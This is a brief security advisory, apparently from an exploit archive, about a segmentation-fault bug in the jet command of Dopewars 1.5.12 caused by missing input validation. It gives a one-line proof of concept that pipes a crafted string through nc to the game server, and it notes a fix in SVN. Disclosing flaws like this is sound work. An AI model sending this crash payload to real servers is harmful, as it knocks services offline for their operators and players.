13 lines
No EOL
328 B
Text
13 lines
No EOL
328 B
Text
## Description ##
|
|
|
|
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
|
|
|
|
## POC ##
|
|
|
|
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
|
|
|
|
## Fix ##
|
|
|
|
This issue is resolved in the SVN version of the application.
|
|
|
|
## Discovered by Doug Prostko |